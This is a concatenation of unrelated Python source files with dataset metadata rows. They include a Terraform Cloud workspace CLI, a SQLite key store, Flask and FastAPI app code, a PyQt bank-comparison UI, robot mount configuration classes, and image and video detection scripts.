        f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
        headers=HEADERS,
    )
    try:
        req.raise_for_status()
    except requests.exceptions.HTTPError as err:
        sys.exit(0)
    pretty_json = json.loads(req.text)
    print (json.dumps(pretty_json, indent=2))
def configure_workspace_by_name(workspace_name):
    """Switch the named workspace to local execution (operations = False)."""
    PAYLOAD = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
    req = requests.patch(
        f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
        json=PAYLOAD,
        headers=HEADERS,
    )
    try:
        req.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print (str(err))
        sys.exit(2)
def configure_workspace_by_id(workspace_id):
    """Switch the workspace with the given ID to local execution (operations = False)."""
    payload = {"data": {"type": "workspaces", "attributes": {"operations": False}}}
    url = f"https://app.terraform.io/api/v2/workspaces/{workspace_id}"
    response = requests.patch(url, json=payload, headers=HEADERS)
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print(str(err))
        sys.exit(2)
def configure_all_workspaces():
    """Walk every page of the organization's workspaces and switch each to local execution."""
    next_page = "https://app.terraform.io/api/v2/organizations/" + ORGANIZATION + "/workspaces"
    while next_page:
        page = requests.get(next_page, headers=HEADERS).json()
        for i in page["data"]:
            ws_id = i["id"]
            ws_name = i["attributes"]["name"]
            print(f"Updating {ws_name}")
            try:
                configure_workspace_by_id(i["id"])
            except requests.exceptions.HTTPError as exc:
                # NOTE(review): configure_workspace_by_id calls sys.exit(2) on
                # HTTPError, so this handler is unlikely to be reached.
                print(f"Error updating {ws_id} {ws_name}: {exc}", file=sys.stderr)
        # Follow the pagination link until the API returns no "next" page.
        next_page = page["links"].get("next")
def delete_workspace(workspace_name):
    """Delete the named Terraform Cloud workspace; print the error and exit(2) on HTTP failure.

    Fix: removed an unused PAYLOAD dict left over from copy/paste —
    the DELETE endpoint takes no request body and the variable was never used.
    """
    req = requests.delete(
        f"https://app.terraform.io/api/v2/organizations/{ORGANIZATION}/workspaces/{workspace_name}",
        headers=HEADERS,
    )
    try:
        req.raise_for_status()
    except requests.exceptions.HTTPError as err:
        print (str(err))
        sys.exit(2)
if __name__ == "__main__":
    # NOTE(review): flags are not mutually exclusive; several actions can run
    # in a single invocation, in the order checked below.
    # init argparse
    parser = argparse.ArgumentParser(description = description)
    parser.add_argument("-V", "--version", help="show version", action="store_true")
    parser.add_argument("-n", "--new", help="create a new workspace")
    parser.add_argument("-c", "--configure", help="configure a workspace to use local execution mode")
    parser.add_argument("-ca", "--configureall", help="configure all workspaces to use local execution mode", action="store_true")
    parser.add_argument("-d", "--delete", help="delete a workspace")
    parser.add_argument("-s", "--show", help="show details of a workspace")
    # read arguments from the command line
    args = parser.parse_args()
    # load terraform cloud api token
    load_api_credentials()
    # check for --version or -V
    if args.version:
        print("Terraform Workspace Tool " + version )
    # check for --new or -n
    if args.new:
        try:
            new_workspace(args.new)
        except AssertionError as err:
            print (str(err))
            sys.exit(2)
    # check for --show or -s
    if args.show:
        try:
            show_workspace(args.show)
        except AssertionError as err:
            print (str(err))
            sys.exit(2)
    # check for --configure or -c
    if args.configure:
        try:
            configure_workspace_by_name(args.configure)
        except AssertionError as err:
            print (str(err))
            sys.exit(2)
    # check for --configureall or -ca
    if args.configureall:
        try:
            configure_all_workspaces()
        except AssertionError as err:
            print (str(err))
            sys.exit(2)
    # check for --delete or -d
    if args.delete:
        try:
            delete_workspace(args.delete)
        except AssertionError as err:
            print (str(err))
            sys.exit(2)
| babywyrm/sysadmin | terraform/tf_workspace_.py | tf_workspace_.py | py | 5,404 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "os.path.expanduser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "re.search",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_n... |
35876191865 | import sqlite3
from sqlite3 import Error
class Key:
    def __init__(self, key,content,info, database_path):
        # Upsert semantics: if no row matches `key`, insert it; otherwise update it.
        # A blank database path or blank key makes this a no-op.
        if database_path!="":
            try:
                self.key = key
                self.database_path =database_path
                if not self.check_key_exists():
                    if len(self.get_all__key(key))==0:
                        if key!="":
                            self.create_key(key,content,info)
                else:
                    self.update_key(key,content,info)
            except Error as e:
                print(e)
def check_key_exists(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT id FROM os WHERE key like '%'+?+'%'", (self.key,))
exists = cursor.fetchone()
conn.close()
if exists is None:
return False
else:
return True
def get_all__key(self, key):
a=[]
if self.database_path!="":
conn = sqlite3.connect(self.database_path)
if key!="":
cur = conn.cursor()
cur.execute("SELECT * FROM os", () )
rows = cur.fetchall()
for row in rows:
#print("s",row[1])
if key in row[1]:
a.append(row[1])
return a
return a;
def find_key_content(self, key):
conn = sqlite3.connect(self.database_path)
a=[]
if key!='':
cur = conn.cursor()
cur.execute("SELECT * FROM os WHERE key=?", (key,) )
rows = cur.fetchall()
for row in rows:
#print("s",row[2])
return row[2]
if key in row[2]:
a.append(row[2])
return a
def delete_key(self,key):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("DELETE FROM os WHERE key=?", (key,))
conn.commit()
conn.close()
except Error as e:
print(e)
def create_key(self,key,content,info):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
print(str(len(self.get_all__key(key))))
if len(self.get_all__key(key))==0:
cursor.execute("INSERT INTO os (key,content,info) VALUES (?,?,?)", (key,content,info))
conn.commit()
conn.close()
except Error as e:
print(e)
def update_key(self,key,content,info):
try:
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("UPDATE os SET content=?,info=? WHERE key=?", (content,info,key))
conn.commit()
conn.close()
except Error as e:
print(e)
def get_key(self):
conn = sqlite3.connect(self.database_path)
cursor = conn.cursor()
cursor.execute("SELECT key FROM os WHERE key=?", (self.key,))
| dahstar/xwx.ctflab | fldb.py | fldb.py | py | 2,775 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sqlite3.Error",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "sqlite3.connect",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "sqlite3.connect",
"... |
33738820247 | from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
db = SQLAlchemy()
def create_app():
    """Application factory: configure Flask, create the DB tables, register blueprints."""
    app = Flask(__name__)
    # Allow cross-origin requests (e.g. from a separately hosted frontend).
    cors = CORS(app)
    app.config["FLASK_DEBUG"] = True
    # NOTE(review): hard-coded secret key — should come from the environment in production.
    app.config['SECRET_KEY'] = 'secret-key-goes-here'
    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'
    # Import models before create_all() so their tables are registered with SQLAlchemy.
    from .models import Result, Patient, DeliveryReports
    db.init_app(app)
    with app.app_context():
        db.create_all()
    from .main import main as main_blueprint
    app.register_blueprint(main_blueprint)
    return app
| KariukiAntony/MMUST-HealthIT-TAT-App | app/__init__.py | __init__.py | py | 571 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "main.main",
... |
38075605873 | # -*- coding: utf-8 -*-
from pathlib import Path
class Manager:
    """Regenerates the repository's top-level README.md table of solved Quera problems."""

    @staticmethod
    def create_readme():
        """Scan each question directory and rebuild README.md with a links table.

        Fix: `create_readme` takes no `self` yet was declared as a plain
        method; it is now a @staticmethod, so both `Manager.create_readme()`
        and instance calls work consistently.
        """
        root_path = Path(__file__).parent
        info ="""## حل سوالات کوئرا
برای دیدن صفحه ی اصلی هر سوال در سایت کوئرا میتوانید روی نام هر سوال کلیک کنید و یا در قسمت توضیحات روی PDF کلیک کنید.
showmeyourcode.ir
"""
        table_header = [
            "شماره سؤال",
            "نام سؤال",
            "youtube",
            "لینک جواب",
            "توضیحات",
        ]
        with open('README.md',"w",encoding="utf8") as main_readme:
            main_readme.write(info+'\n')
            # Markdown table header and separator rows.
            main_readme.write("|"+"|".join(table_header)+"|"+'\n')
            main_readme.write("|-"*len(table_header)+"|"+'\n')
            index=1
            # One table row per question directory (skip files and dot-dirs).
            for question_path in root_path.glob(r"*/"):
                if not question_path.is_file() and not str(question_path.relative_to(root_path)).startswith("."):
                    main_readme.write(f"|{index}")
                    # First two lines of each question's readme.md: number and name cells.
                    with open(str(question_path.joinpath("readme.md")),"r",encoding="utf8") as local_readme:
                        main_readme.write("|"+local_readme.readline().strip())
                        main_readme.write("|"+local_readme.readline().strip())
                    main_readme.write("|")
                    # Link each per-language solution directory (URL-encode spaces).
                    for language in question_path.glob("*"):
                        if language.is_dir():
                            readme_path = str(language.relative_to(root_path)).replace(' ','%20').replace('\\','/')
                            main_readme.write(f"[{str(language.relative_to(question_path))}]({readme_path}), ")
                    main_readme.write("|")
                    # Link any extra markdown notes and problem-statement PDFs.
                    for local_readmes in question_path.glob("*.md"):
                        if local_readmes.is_file():
                            readme_path = str(local_readmes.relative_to(root_path)).replace(' ','%20').replace('\\','/')
                            main_readme.write(f"[readme]({readme_path}), ")
                    for pdfs in question_path.glob("*.pdf"):
                        if pdfs.is_file():
                            pdf = str(pdfs.relative_to(root_path)).replace(' ','%20').replace('\\','/')
                            main_readme.write(f"[pdf]({pdf}), ")
                    main_readme.write("|\n")
                    index+=1
if __name__ == "__main__":
    # Rebuild README.md when invoked directly.
    Manager.create_readme()
| MohammadNPak/quera.ir | manage.py | manage.py | py | 2,594 | python | en | code | 40 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 8,
"usage_type": "call"
}
] |
31920197231 | from google.cloud import vision
# `with` manages the file handle automatically from open to close.
# 'rb' = read-binary mode, for non-text data such as images and video.
# Open and read road.jpg.
with open('./road.jpg', 'rb') as image_file:
    content = image_file.read()
# Wrap the raw bytes in an image object the Vision API can consume.
image = vision.Image(content=content)
# "Annotation" means tagging data of any format (text, audio, images) with labels;
# the client is the object that talks to the service.
# Create an ImageAnnotatorClient instance and request label detection.
annotater_client = vision.ImageAnnotatorClient()
response_data = annotater_client.label_detection(image=image)
labels = response_data.label_annotations
# Print each detected label with its confidence as a percentage.
print('----RESULT----')
for label in labels:
    print(label.description, ':', round(label.score * 100, 2), '%')
print('----RESULT----')
| yuuki-1227/vision-ai-test | index.py | index.py | py | 916 | python | ja | code | 0 | github-code | 36 | [
{
"api_name": "google.cloud.vision.Image",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "google.cloud.vision",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "google.cloud.vision.ImageAnnotatorClient",
"line_number": 17,
"usage_type": "call"
},
{... |
39939114136 | from PyQt5.QtWidgets import QTableWidgetItem, QLabel, QFileDialog
from PyQt5.QtCore import Qt
from pandas.tests.io.excel.test_xlrd import xlwt
from UI.resultWinUI import *
from algorithm import *
from UI.mainWinUI import *
class BrokerWin(Ui_MainWindow, QtWidgets.QMainWindow):
    """Main window: collects bank-selection criteria for individuals (fiz) and businesses (biz)."""
    def __init__(self, parent=None):
        QtWidgets.QWidget.__init__(self, parent)
        self.setupUi(self)
        self.setFixedSize(1100, 540)
        # Wire up the submit and "select all" buttons for both customer tabs.
        self.fizButton.clicked.connect(self.sendInputFiz)
        self.bizButton.clicked.connect(self.sendInputBiz)
        self.selectAll.clicked.connect(self.selectAllFiz)
        self.selectAll_2.clicked.connect(self.selectAllBiz)
    def sendInputFiz(self):
        """Collect the individual-customer criteria and open the result window."""
        banks.clear()
        black_list.clear()
        # Required services (checkboxes).
        optional_fiz['Осуществление автоплатежей'] = self.autoPayments.isChecked()
        optional_fiz['Перевод за рубеж'] = self.foreignTransfer.isChecked()
        optional_fiz['Создание автоперевода'] = self.createAutoPayments.isChecked()
        optional_fiz['Новости системы банка онлайн'] = self.news.isChecked()
        optional_fiz['Автострахование'] = self.insuranceAuto.isChecked()
        optional_fiz['Страхование недвижимости'] = self.insuranceEstate.isChecked()
        optional_fiz['Страхование путешественников'] = self.insuranceTravellers.isChecked()
        optional_fiz['Страхование пассажиров'] = self.insurancePassangers.isChecked()
        optional_fiz['Наличие мобильного приложения'] = self.mobileApp.isChecked()
        optional_fiz['Открытие брокерского счета'] = self.brokerAccount.isChecked()
        # User-weighted (ranked) criteria from the spin boxes.
        ranked_fiz['Переводы на карту'] = self.transferToClient_fiz_SpinBox.value()
        ranked_fiz['Минимальная сумма вклада'] = self.depositSum_fiz_SpinBox.value()
        ranked_fiz['Процент по вкладу '] = self.persentDepozit_fiz_SpinBox.value()
        ranked_fiz['Сумма кредита'] = self.creditSum_fiz_SpinBox.value()
        ranked_fiz['Ставка кредита'] = self.percentCredit_fiz_SpinBox.value()
        ranked_fiz['Переводы на карты по номеру телефона'] = self.transferNumber_fiz_SpinBox.value()
        choose_necessary('fiz')
        choose_ranked('fiz')
        # Open the results window with the chosen sort order.
        kind_of_sort = self.sort_fiz.currentText()
        # self.close()
        if kind_of_sort == "Пользовательскому рейтингу":
            self.Open = ResultWin("По рейтингу")
        elif kind_of_sort == "Кредитным условиям":
            self.Open = ResultWin("по кредиту")
        elif kind_of_sort == "Условиям по вкладам":
            self.Open = ResultWin("по вкладу")
        self.Open.show()
        # print(special_sort('По рейтингу'))
    def sendInputBiz(self):
        """Collect the business-customer criteria and open the result window."""
        banks.clear()
        black_list.clear()
        # Required services (checkboxes).
        optional_biz['Мобильное приложение'] = self.mobileApp_biz.isChecked()
        optional_biz['Торговый эквайринг'] = self.trade_biz.isChecked()
        optional_biz['Мобильный эквайринг'] = self.mobileTrade_biz.isChecked()
        optional_biz['Онлайн-бухгалтерия'] = self.onlineAccounting_biz.isChecked()
        optional_biz['Проверка контрагентов'] = self.checkAgents_biz.isChecked()
        optional_biz['Управление корпоративными картами'] = self.cards_biz.isChecked()
        optional_biz['Финансовая аналитика'] = self.analitics_biz.isChecked()
        optional_biz['Техподдержка клиентов 24/7'] = self.clientSupport_biz.isChecked()
        optional_biz['Персональный менеджер'] = self.personalManager_biz.isChecked()
        # User-weighted (ranked) criteria from the spin boxes.
        ranked_biz['Стоимость обслуживания'] = self.mounthPayment_biz_SpinBox.value()
        ranked_biz['% за снятие наличных'] = self.cashComission_biz_SpinBox.value()
        ranked_biz['% за внесение наличных'] = self.cashInputComission_biz_SpinBox.value()
        ranked_biz['Лимит перевода на карту физ.лица'] = self.transfer_biz_SpinBox.value()
        choose_necessary('biz')
        choose_ranked('biz')
        # Open the results window with the chosen sort order.
        kind_of_sort = self.sort_biz.currentText()
        # self.close()
        if kind_of_sort == "Пользовательскому рейтингу":
            self.Open = ResultWin("По рейтингу")
        elif kind_of_sort == "Стоимости обслуживания":
            self.Open = ResultWin("По обслуживанию в месяц")
        self.Open.show()
    def selectAllFiz(self):
        """Check every individual-customer service checkbox."""
        self.autoPayments.setChecked(True)
        self.foreignTransfer.setChecked(True)
        self.createAutoPayments.setChecked(True)
        self.news.setChecked(True)
        self.insuranceAuto.setChecked(True)
        self.insuranceEstate.setChecked(True)
        self.insuranceTravellers.setChecked(True)
        self.insurancePassangers.setChecked(True)
        self.mobileApp.setChecked(True)
        self.brokerAccount.setChecked(True)
    def selectAllBiz(self):
        """Check every business-customer service checkbox."""
        self.mobileApp_biz.setChecked(True)
        self.trade_biz.setChecked(True)
        self.mobileTrade_biz.setChecked(True)
        self.onlineAccounting_biz.setChecked(True)
        self.checkAgents_biz.setChecked(True)
        self.cards_biz.setChecked(True)
        self.analitics_biz.setChecked(True)
        self.clientSupport_biz.setChecked(True)
        self.personalManager_biz.setChecked(True)
class ResultWin(Ui_ResultWindow, QtWidgets.QMainWindow):
    """Results window: fills a table with ranked banks and can export it to .xls."""
    def __init__(self, type_of_sort, parent=None):
        QtWidgets.QWidget.__init__(self, parent)
        self.setupUi(self)
        self.setFixedSize(930, 900)
        # Sort mode string is passed straight to special_sort().
        self.type_of_sort = type_of_sort
        self.showResult()
    def showResult(self):
        """Populate the table widget with the sorted bank results."""
        result = special_sort(self.type_of_sort)
        i = 0
        self.sites=[]
        # Per-bank reference data: column 0 = site URL, 1..3 = descriptive fields.
        information = pd.read_csv("files/banks_info.csv", encoding="cp1251", sep=";")
        for key in result.keys():
            for bank in result[key]:
                self.tableWidget.insertRow(i)
                label = QLabel()
                item = QTableWidgetItem(str(key))
                item.setTextAlignment(Qt.AlignHCenter)
                self.tableWidget.setItem(i, 0, item)
                self.tableWidget.setItem(i, 1, QTableWidgetItem(bank))
                # Remember the raw URL for the .xls export (cell widgets are not exported).
                self.sites.append(information[bank][0])
                label.setText('<a href="'+information[bank][0]+'">'+information[bank][0]+'</a>')
                label.setOpenExternalLinks(True)
                self.tableWidget.setCellWidget(i, 2, label)
                self.tableWidget.setItem(i, 3, QTableWidgetItem(information[bank][1]))
                item=QTableWidgetItem(information[bank][2])
                item.setTextAlignment(Qt.AlignHCenter)
                self.tableWidget.setItem(i, 4, item)
                item = QTableWidgetItem(information[bank][3])
                item.setTextAlignment(Qt.AlignHCenter)
                self.tableWidget.setItem(i, 5, item)
                i += 1
        self.tableWidget.resizeColumnsToContents()
        self.importButton.clicked.connect(self.savefile)
        # Style the header row (note: two adjacent string literals are concatenated).
        style = "::section {""background-color: #ffc02b; font:10pt; }"
        self.tableWidget.horizontalHeader().setStyleSheet(style)
    def savefile(self):
        """Export the table contents to an .xls file chosen via a save dialog."""
        filename, _ = QFileDialog.getSaveFileName(self, 'Save File', '', ".xls(*.xls)")
        wbk = xlwt.Workbook()
        sheet = wbk.add_sheet("sheet", cell_overwrite_ok=True)
        style = xlwt.XFStyle()
        model = self.tableWidget.model()
        # Header row.
        for c in range(model.columnCount()):
            text = model.headerData(c, QtCore.Qt.Horizontal)
            sheet.write(0, c , text, style=style)
        # Data cells.
        for c in range(model.columnCount()):
            for r in range(model.rowCount()):
                text = model.data(model.index(r, c))
                sheet.write(r + 1, c, text)
        # Column 2 holds QLabel widgets in the UI, so write the stored URLs instead.
        for r in range(model.rowCount()):
            text = self.sites[r]
            sheet.write(r + 1, 2, text)
        wbk.save(filename)
| JuliaZimina/Remote-Banking-Brokers | UI/brokerUI.py | brokerUI.py | py | 8,392 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QLabel",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtWidgets.QTableWidgetItem",
"line_number": 124,
"usage_type": "call"
},
{
"api_name": "PyQt5.QtCore.Qt.AlignHCenter",
"line_number": 125,
"usage_type": "attribute"
... |
15672387350 | from clearpath_config.common.types.config import BaseConfig
from clearpath_config.common.types.list import OrderedListConfig
from clearpath_config.common.utils.dictionary import flip_dict
from clearpath_config.mounts.types.fath_pivot import FathPivot
from clearpath_config.mounts.types.flir_ptu import FlirPTU
from clearpath_config.mounts.types.mount import BaseMount
from clearpath_config.mounts.types.pacs import PACS
from clearpath_config.mounts.types.post import Post
from clearpath_config.mounts.types.sick import SICKStand
from clearpath_config.mounts.types.disk import Disk
from typing import List
class Mount():
    """Factory for mount objects: ``Mount(model)`` returns a fresh instance
    of the concrete mount class registered under *model*."""

    # Model-name constants mirrored from the concrete mount classes.
    FATH_PIVOT = FathPivot.MOUNT_MODEL
    FLIR_PTU = FlirPTU.MOUNT_MODEL
    PACS_RISER = PACS.Riser.MOUNT_MODEL
    PACS_BRACKET = PACS.Bracket.MOUNT_MODEL

    # Registry: model name -> mount class.
    MODEL = {
        FATH_PIVOT: FathPivot,
        FLIR_PTU: FlirPTU,
        PACS_RISER: PACS.Riser,
        PACS_BRACKET: PACS.Bracket,
    }

    def __new__(cls, model: str) -> BaseMount:
        # Validate the requested model name before dispatching.
        assert model in Mount.MODEL, (
            "Model '%s' must be one of: '%s'" % (model, Mount.MODEL.keys()))
        # Instantiate and return the registered class (not a Mount).
        return Mount.MODEL[model]()
class MountListConfig(OrderedListConfig[BaseMount]):
    """Ordered list of mounts that can serialize itself to a list of dicts."""

    def __init__(self) -> None:
        super().__init__(obj_type=BaseMount)

    def to_dict(self) -> List[dict]:
        """Serialize every mount in order (was a manual append loop)."""
        return [accessory.to_dict() for accessory in self.get_all()]
class MountsConfig(BaseConfig):
    """Aggregates every mount section of the robot configuration.

    Each mount family (bracket, fath pivot, riser, SICK stand, post, disk)
    is stored as a MountListConfig; reading a family's property also writes
    its serialized form back into the underlying config dict.
    """
    MOUNTS = "mounts"
    BRACKET = PACS.Bracket.MOUNT_MODEL
    FATH_PIVOT = FathPivot.MOUNT_MODEL
    RISER = PACS.Riser.MOUNT_MODEL
    SICK = SICKStand.MOUNT_MODEL
    POST = Post.MOUNT_MODEL
    DISK = Disk.MOUNT_MODEL

    TEMPLATE = {
        MOUNTS: {
            BRACKET: BRACKET,
            FATH_PIVOT: FATH_PIVOT,
            RISER: RISER,
            SICK: SICK,
            POST: POST,
            DISK: DISK,
        }
    }

    KEYS = flip_dict(TEMPLATE)

    DEFAULTS = {
        BRACKET: [],
        FATH_PIVOT: [],
        RISER: [],
        SICK: [],
        POST: [],
        DISK: [],
    }

    def __init__(
            self,
            # NOTE(review): mutable defaults kept for interface compatibility;
            # they are only read here, never mutated.
            config: dict = {},
            bracket: List[PACS.Bracket] = DEFAULTS[BRACKET],
            fath_pivot: List[FathPivot] = DEFAULTS[FATH_PIVOT],
            riser: List[PACS.Riser] = DEFAULTS[RISER],
            sick_stand: List[SICKStand] = DEFAULTS[SICK],
            post: List[Post] = DEFAULTS[POST],
            disk: List[Disk] = DEFAULTS[DISK],
            ) -> None:
        # Initialization: each assignment goes through the property setter
        # below, which validates and converts the list of dicts.
        self.bracket = bracket
        self.fath_pivot = fath_pivot
        self.riser = riser
        self.sick_stand = sick_stand
        self.post = post
        self.disk = disk
        # Template: maps config keys to the class-level property objects.
        template = {
            self.KEYS[self.BRACKET]: MountsConfig.bracket,
            self.KEYS[self.FATH_PIVOT]: MountsConfig.fath_pivot,
            self.KEYS[self.RISER]: MountsConfig.riser,
            self.KEYS[self.SICK]: MountsConfig.sick_stand,
            self.KEYS[self.POST]: MountsConfig.post,
            self.KEYS[self.DISK]: MountsConfig.disk,
        }
        super().__init__(template, config, self.MOUNTS)

    @staticmethod
    def _build_mount_list(value: List[dict], factory) -> MountListConfig:
        """Validate a list of mount dicts and build a MountListConfig.

        *factory* is a zero-argument callable producing an empty mount of
        the right type; each dict is then loaded via ``from_dict``. This
        replaces six copy-pasted validation/conversion blocks in the
        setters below.
        """
        assert isinstance(value, list), (
            "Mounts must be list of 'dict'")
        assert all([isinstance(i, dict) for i in value]), (
            "Mounts must be list of 'dict'")
        mounts = MountListConfig()
        mount_list = []
        for d in value:
            mount = factory()
            mount.from_dict(d)
            mount_list.append(mount)
        mounts.set_all(mount_list)
        return mounts

    @property
    def bracket(self) -> OrderedListConfig:
        # Reading the property also refreshes the serialized config entry.
        self.set_config_param(
            key=self.KEYS[self.BRACKET],
            value=self._bracket.to_dict()
        )
        return self._bracket

    @bracket.setter
    def bracket(self, value: List[dict]) -> None:
        self._bracket = self._build_mount_list(value, PACS.Bracket)

    @property
    def riser(self) -> OrderedListConfig:
        self.set_config_param(
            key=self.KEYS[self.RISER],
            value=self._riser.to_dict()
        )
        return self._riser

    @riser.setter
    def riser(self, value: List[dict]) -> None:
        # Riser requires explicit minimal dimensions before from_dict()
        # fills in the real values.
        self._riser = self._build_mount_list(
            value, lambda: PACS.Riser(rows=1, columns=1))

    @property
    def fath_pivot(self) -> OrderedListConfig:
        self.set_config_param(
            key=self.KEYS[self.FATH_PIVOT],
            value=self._fath_pivot.to_dict()
        )
        return self._fath_pivot

    @fath_pivot.setter
    def fath_pivot(self, value: List[dict]) -> None:
        self._fath_pivot = self._build_mount_list(value, FathPivot)

    @property
    def sick_stand(self) -> OrderedListConfig:
        self.set_config_param(
            key=self.KEYS[self.SICK],
            value=self._sick.to_dict()
        )
        return self._sick

    @sick_stand.setter
    def sick_stand(self, value: List[dict]) -> None:
        self._sick = self._build_mount_list(value, SICKStand)

    @property
    def post(self) -> OrderedListConfig:
        self.set_config_param(
            key=self.KEYS[self.POST],
            value=self._post.to_dict()
        )
        return self._post

    @post.setter
    def post(self, value: List[dict]) -> None:
        self._post = self._build_mount_list(value, Post)

    @property
    def disk(self) -> OrderedListConfig:
        self.set_config_param(
            key=self.KEYS[self.DISK],
            value=self._disk.to_dict()
        )
        return self._disk

    @disk.setter
    def disk(self, value: List[dict]) -> None:
        self._disk = self._build_mount_list(value, Disk)

    # Get All Mounts
    def get_all_mounts(self) -> List[BaseMount]:
        """Flatten every mount family into a single list."""
        mounts = []
        mounts.extend(self.fath_pivot.get_all())
        mounts.extend(self.riser.get_all())
        mounts.extend(self.bracket.get_all())
        mounts.extend(self.sick_stand.get_all())
        mounts.extend(self.post.get_all())
        mounts.extend(self.disk.get_all())
        return mounts
| clearpathrobotics/clearpath_config | clearpath_config/mounts/mounts.py | mounts.py | py | 7,899 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "clearpath_config.mounts.types.fath_pivot.FathPivot.MOUNT_MODEL",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "clearpath_config.mounts.types.fath_pivot.FathPivot",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "clearpath_config.mounts.ty... |
35451201459 | import cv2
from pydarknet import Detector, Image
# Load the darknet network once at import time (cfg/weights/data of the tank model).
net = Detector(bytes("tank.cfg", encoding="utf-8"), bytes("tank.weights", encoding="utf-8"), 0, bytes("tank.data",encoding="utf-8"))
def Detect(path):
    """Run tank detection on every frame of the video at *path*.

    Draws a box and class label on each detection and shows the annotated
    frame; press 'q' in the window to stop early. The capture and windows
    are released on exit.
    """
    vidObj = cv2.VideoCapture(path)
    try:
        while True:
            success, image = vidObj.read()
            if not success:
                # End of stream or read failure: `image` is None here, so the
                # original code crashed on the final iteration.
                break
            img_darknet = Image(image)
            results = net.detect(img_darknet)
            for cat, score, bounds in results:
                # bounds are (center_x, center_y, width, height).
                x, y, w, h = bounds
                cv2.rectangle(image, (int(x - w / 2), int(y - h / 2)),
                              (int(x + w / 2), int(y + h / 2)), (255, 0, 0), thickness=2)
                cv2.putText(image, str(cat.decode("utf-8")), (int(x), int(y)),
                            cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 0))
            cv2.imshow("Detected Tank", image)
            if cv2.waitKey(25) & 0xFF == ord('q'):
                break
    finally:
        # Always free the capture device and any display windows.
        vidObj.release()
        cv2.destroyAllWindows()
if __name__ == '__main__':
    #Detect(path to the surveillance video)
    # Demo run against the bundled sample clip.
    Detect("test.mp4")
| wisekrack/BattleTankDown | tankLocFromSurveillanceVideo.py | tankLocFromSurveillanceVideo.py | py | 958 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pydarknet.Detector",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pydarknet.Image",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.rectangle",
... |
30352454411 | from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from starlette import status
from starlette.responses import RedirectResponse
from database import get_db
from domain.answer import answer_schema, answer_crud
from domain.question import question_crud, question_schema
from domain.user.user_router import get_current_user
from models import User
# All answer endpoints are mounted under /api/answer.
router = APIRouter(
    prefix="/api/answer",
)
@router.post("/create/{question_id}", response_model=question_schema.Question)
def answer_create(question_id: int,
                  _answer_create: answer_schema.AnswerCreate,
                  db: Session = Depends(get_db),
                  current_user: User = Depends(get_current_user)):
    """Create an answer on a question, then redirect to the question detail page.

    Raises HTTP 404 when the question does not exist.
    """
    # create answer
    question = question_crud.get_question(db, question_id=question_id)
    if not question:
        raise HTTPException(status_code=404, detail="Question not found")
    answer_crud.create_answer(db, question=question,
                              answer_create=_answer_create,
                              user=current_user)
    # redirect with 303 See Other so the browser re-GETs the detail page.
    # Imported locally -- presumably to avoid a circular import with
    # question_router; confirm before moving it to the top of the file.
    from domain.question.question_router import router as question_router
    url = question_router.url_path_for('question_detail',
                                      question_id=question_id)
    return RedirectResponse(url, status_code=303)
@router.put("/update", status_code=status.HTTP_204_NO_CONTENT)
def amswer_update(_answer_update: answer_schema.AnswerUpdate, db: Session = Depends(get_db), current_user: User = Depends(get_current_user)):
    """Update an answer; 400 when it is missing or owned by another user.

    NOTE(review): the function name has a typo ("amswer"); it is kept as-is
    because route handler names may be referenced elsewhere (url_path_for).
    The keyword ``answer_updaete`` below presumably matches the same typo in
    answer_crud.update_answer's signature -- verify before fixing either.
    """
    db_answer = answer_crud.get_answer(db, answer_id=_answer_update.answer_id)
    if not db_answer:
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="데이터를 찾을 수 없습니다.")
    if current_user.id != db_answer.user.id:
        # Only the author may edit their own answer.
        raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail="수정 권한이 없습니다.")
    answer_crud.update_answer(db=db, db_answer=db_answer, answer_updaete=_answer_update)
@router.get("/detail/{answer_id}", response_model=answer_schema.Answer)
def answer_detail(answer_id: int, db: Session = Depends(get_db)):
    """Return a single answer by id.

    Raises HTTP 404 when no such answer exists. Previously a missing answer
    returned None, which failed response_model validation and surfaced as a
    500 to the client.
    """
    answer = answer_crud.get_answer(db, answer_id=answer_id)
    if not answer:
        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="Answer not found")
    return answer
